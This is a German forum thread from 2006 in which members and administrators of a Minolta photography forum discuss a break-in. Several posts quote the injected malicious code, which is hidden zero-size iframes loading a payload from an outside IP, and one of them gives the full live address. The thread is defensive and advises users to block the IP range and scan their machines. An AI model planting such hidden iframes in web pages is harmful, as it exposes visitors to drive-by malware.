Forum Übersicht - RE: Software-Update - 29

Wenn ich die Quellentext anschaue, sehe ich alle auskommentierten php-Code. Bitte dieser Teil verschwinden lassen! Ist für euer Sicherheit besser.

Zusätzlich würde ich alle Administratoren und Website-Passwörter wechseln.

Danke und Gruss
Peter

Und schon wieder geknackt (Hauptseite)...

ZITAt (Peter Lehner @ 2006-09-13, 23:16) Wenn ich die Quellentext anschaue, sehe ich alle auskommentierten php-Code. Bitte dieser Teil verschwinden lassen! Ist für euer Sicherheit besser.[/quote]

Wo siehst Du auskommentierten PHP Code? Ich sehe nur "richtig" HTML - auskommentieren Javascript Code, und das paßt doch alles, denn der wird auch verwendet. /wink.gif" style="vertical-align:middle" emoid="" border="0" alt="wink.gif" />

LG, Hendrik

EDIT: Frage genauer gestellt um weitere Mißverständnisse zu vermeiden.

ZITAt (hendriks @ 2006-09-14, 19:48) ZITAt (Peter Lehner @ 2006-09-13, 23:16)
Wenn ich die Quellentext anschaue, sehe ich alle auskommentierten php-Code. Bitte dieser Teil verschwinden lassen! Ist für euer Sicherheit besser.[/quote]

Wo? Ich sehe nur "richtig" HTML - auskommentieren Javascript Code, und das paßt doch alles, denn der wird auch verwendet. /wink.gif" style="vertical-align:middle" emoid="" border="0" alt="wink.gif" />

LG, Hendrik
[/quote]

Nee - im Quelltext ist das in der letzten Zeile gut sichtbar... /ninja.gif" style="vertical-align:middle" emoid="" border="0" alt="ninja.gif" />

ZITAt (fwiesenberg @ 2006-09-14, 19:55) ZITAt (hendriks @ 2006-09-14, 19:48)
ZITAt (Peter Lehner @ 2006-09-13, 23:16)
Wenn ich die Quellentext anschaue, sehe ich alle auskommentierten php-Code. Bitte dieser Teil verschwinden lassen! Ist für euer Sicherheit besser.[/quote]

Wo? Ich sehe nur "richtig" HTML - auskommentieren Javascript Code, und das paßt doch alles, denn der wird auch verwendet. /wink.gif" style="vertical-align:middle" emoid="" border="0" alt="wink.gif" />

LG, Hendrik
[/quote]

Nee - im Quelltext ist das in der letzten Zeile gut sichtbar... /ninja.gif" style="vertical-align:middle" emoid="" border="0" alt="ninja.gif" />
[/quote]

/blink.gif" style="vertical-align:middle" emoid="" border="0" alt="blink.gif" />

Kannst Du mir den Zusammenhang erklären? Ich weiß nämlich nicht worauf Du hinaus willst ...

LG, Hendrik

ZITAt (hendriks @ 2006-09-14, 20:39) ZITAt (fwiesenberg @ 2006-09-14, 19:55)
ZITAt (hendriks @ 2006-09-14, 19:48)
ZITAt (Peter Lehner @ 2006-09-13, 23:16)
Wenn ich die Quellentext anschaue, sehe ich alle auskommentierten php-Code. Bitte dieser Teil verschwinden lassen! Ist für euer Sicherheit besser.[/quote]

Wo? Ich sehe nur "richtig" HTML - auskommentieren Javascript Code, und das paßt doch alles, denn der wird auch verwendet. /wink.gif" style="vertical-align:middle" emoid="" border="0" alt="wink.gif" />

LG, Hendrik
[/quote]

Nee - im Quelltext ist das in der letzten Zeile gut sichtbar... /ninja.gif" style="vertical-align:middle" emoid="" border="0" alt="ninja.gif" />
[/quote]

/blink.gif" style="vertical-align:middle" emoid="" border="0" alt="blink.gif" />

Kannst Du mir den Zusammenhang erklären? Ich weiß nämlich nicht worauf Du hinaus willst ...

LG, Hendrik
[/quote]

...dann helfe ich dir mal auf die Sprünge:

Dein Rechner ist durchaus in der Lage, deutlich mehr zu machen als man nur an der Oberfläche der Startseite am Bildschirm sieht. In diesem Fall ist im Quelltext das zu sehen, was Matthias HIER ansprach - an der sichtbaren Benutzeroberfläche gab es (bis auf den in schneller Folge ggf. mehrmals erscheinenden Zugriff auf die russische IP-Adresse) keinen Hinweis auf "unlautere" Aktivität (wie seinerzeit zB. das "rote X" als Platzhalter für ein gestoptes Script...).

ZITATLiebe Mitglieder,

wie Ihr bestimmt schon mitbekommen habt, ist heute Nacht leider in unser Forum eingebrochen worden. Im Quelltext der Seiten findet Ihr einen

<iframe src="http://xx.xx.xxx.xx/uname/in.html" border=0 width=0 height=0></iframe>

oder auch

<iframe src="http://xx.xx.xxx.xx/dispatch.php" border=0 width=0 height=0></iframe>

der auf eine fremde Seite in Russland verweist.

Bitte schaltet Java, JavaScript und alle anderen Web-Script-Sprachen in Eurem Web-Browser aus
und blockt den IP-Bereich 81.95.146.* in Eurer Firewall.

Weiterhin empfehle ich, Euren Browser-Cache zu löschen und mit einem aktuellen Virenscanner Eure Rechner zu überprüfen.

Wer derzeit (per Cookie) eingeloggt ist, kann es weiter bleiben. Den anderen empfehle ich, sich im Moment nicht neu einzuloggen, bis wir das Ausmaß des Schadens kennen.

Da auch die PN-Funktion des Forums (immer noch) gestört ist, nochmal der Hinweis, daß Ihr uns unter unseren *Vornamen* @mi-fo.de per E-Mail erreichen könnt. Bitte schreibt dann direkt an alle drei Admins.

Wir arbeiten an dem Problem, können aber noch nicht sagen, wie lange es dauern wird. Sorry.

Euer Minolta-Forum-Team[/quote]

(Da es in der Rubrik "Umfragen" etwas untergegangen ist, habe ich mir erlaubt, den Hinweis komplett zu zitieren...)

ZITAt (fwiesenberg @ 2006-09-14, 20:55) ZITAt (hendriks @ 2006-09-14, 20:39)
ZITAt (fwiesenberg @ 2006-09-14, 19:55)
ZITAt (hendriks @ 2006-09-14, 19:48)
ZITAt (Peter Lehner @ 2006-09-13, 23:16)
Wenn ich die Quellentext anschaue, sehe ich alle auskommentierten php-Code. Bitte dieser Teil verschwinden lassen! Ist für euer Sicherheit besser.[/quote]
Wo? Ich sehe nur "richtig" HTML - auskommentieren Javascript Code, und das paßt doch alles, denn der wird auch verwendet. /wink.gif" style="vertical-align:middle" emoid="" border="0" alt="wink.gif" />
[/quote]

Nee - im Quelltext ist das in der letzten Zeile gut sichtbar... /ninja.gif" style="vertical-align:middle" emoid="" border="0" alt="ninja.gif" />
[/quote]
Kannst Du mir den Zusammenhang erklären? Ich weiß nämlich nicht worauf Du hinaus willst ...
[/quote]

...dann helfe ich dir mal auf die Sprünge:

[...]
[/quote]

Jaja, das ist mir schon klar /wink.gif" style="vertical-align:middle" emoid="" border="0" alt="wink.gif" />

Jetzt ist mir auch klar, das Du meine Frage nicht verstanden hast, ich habe nicht nach der Position des iframe s gefragt sondern nach dem (auskommentierten) PHP Code, den Peter endeckt haben will.

LG, Hendrik

ZITAt (fwiesenberg @ 2006-09-14, 20:55) (Da es in der Rubrik "Umfragen" etwas untergegangen ist, habe ich mir erlaubt, den Hinweis komplett zu zitieren...)[/quote]
;-) Die Ankündigung findest Du aber nicht nur in "Umfragen", sondern in sämtlichen Foren an oberster Stelle.
Auch wenn meinem Kenntnisstand nach im Moment wieder alles im Lot zu sein scheint, können wir übrigens noch keine Entwarnung geben. Wenn Ihr was Verdächtiges seht, gebt uns bitte sofort Bescheid (per E-Mail an alle drei Admins oder z.B. hier im Thread). Danke.

Viele Grüße,

Matthias

PS: Archivierte Ankündigung:
ZITATLiebe Mitglieder,

wie Ihr bestimmt schon mitbekommen habt, ist heute Nacht leider in unser Forum eingebrochen worden. Im Quelltext der Seiten findet Ihr einen

<iframe src="http://xx.xx.xxx.xx/uname/in.html" border=0 width=0 height=0></iframe>

oder auch

<iframe src="http://xx.xx.xxx.xx/dispatch.php" border=0 width=0 height=0></iframe>

der auf eine fremde Seite in Russland verweist.

Bitte schaltet Java, JavaScript und alle anderen Web-Script-Sprachen in Eurem Web-Browser aus
und blockt den IP-Bereich 81.95.146.* in Eurer Firewall.

Weiterhin empfehle ich, Euren Browser-Cache zu löschen und mit einem aktuellen Virenscanner Eure Rechner zu überprüfen.

Wer derzeit (per Cookie) eingeloggt ist, kann es weiter bleiben. Den anderen empfehle ich, sich im Moment nicht neu einzuloggen, bis wir das Ausmaß des Schadens kennen.

Da auch die PN-Funktion des Forums (immer noch) gestört ist, nochmal der Hinweis, daß Ihr uns unter unseren *Vornamen* @mi-fo.de per E-Mail erreichen könnt. Bitte schreibt dann direkt an alle drei Admins.

Wir arbeiten an dem Problem, können aber noch nicht sagen, wie lange es dauern wird. Sorry.

Euer Minolta-Forum-Team[/quote]

ZITATJaja, das ist mir schon klar /wink.gif" style="vertical-align:middle" emoid="" border="0" alt="wink.gif" />

Jetzt ist mir auch klar, das Du meine Frage nicht verstanden hast, ich habe nicht nach der Position des iframe s gefragt sondern nach dem (auskommentierten) PHP Code, den Peter endeckt haben will.

LG, Hendrik[/quote]

Ok - den sehe ich auch nicht.
Allerdings ist Peters Hinweis immerhin einen Tag alt...

ZITAt (fwiesenberg @ 2006-09-14, 21:15) ZITATJaja, das ist mir schon klar /wink.gif" style="vertical-align:middle" emoid="" border="0" alt="wink.gif" />

Jetzt ist mir auch klar, das Du meine Frage nicht verstanden hast, ich habe nicht nach der Position des iframe s gefragt sondern nach dem (auskommentierten) PHP Code, den Peter endeckt haben will.

LG, Hendrik[/quote]

Ok - den sehe ich auch nicht.
Allerdings ist Peters Hinweis immerhin einen Tag alt...
[/quote]

Ja und ich gehe davon aus, das er Javascript gesehen hat, denn wenn PHP auskommentiert wird, wird das nicht mitgeschickt, d.h. ist auch im Quelltext der Seite, die zum Browser geschickt wird, nicht zu sehen.

LG, Hendrik

Egal, ob oder was Peter jetzt gesehen hat, wenn Ihr sowas demnächst seht, macht Euch bitte im Falle eines Falles sofort eine Kopie davon (nicht nur den Link speichern), packt es in ein ZIP-Archiv und schickt es uns per E-Mail zu. Sollte da wirklich gerade "jemand" zu Gange sein, ist es u.U. nicht sinnvoll, den Inhalt hier im Thread zu posten.

Viele Grüße,

Matthias

...der/die/das Witzbold scheint sich nun auch die Galerie vorgenommen zu haben...

Es sieht aus, als wäre der Upload in der Galerie auf regulärem Weg geschehen und nur dazu da, eine Verwundbarkeit an anderer Stelle auszunützen:

http://www.rohitab.com/discuss/lofiversion...php/t9626.html

Evtl hat er mit seinem Usernamen in der Galerie ja noch eine IP dagelassen /ninja.gif" style="vertical-align:middle" emoid="" border="0" alt="ninja.gif" />

Erinnerung: Auf der Hauptseite steht ist immer noch der Schadcode:

<!-- 1158297517 --><iframe src=http://81.95.146.90/dispatch.php?src=minolta width=0 height=0 border=0></iframe>
 

ZITAt (Michael H @ 2006-09-15, 7:20) Erinnerung: Auf der Hauptseite steht ist immer noch der Schadcode:

<!-- 1158297517 --><iframe src=http://81.95.146.90/dispatch.php?src=minolta width=0 height=0 border=0></iframe>
 

[/quote]

Danke für den Hinweis, Michael! Sollte nun auf wieder behoben sein.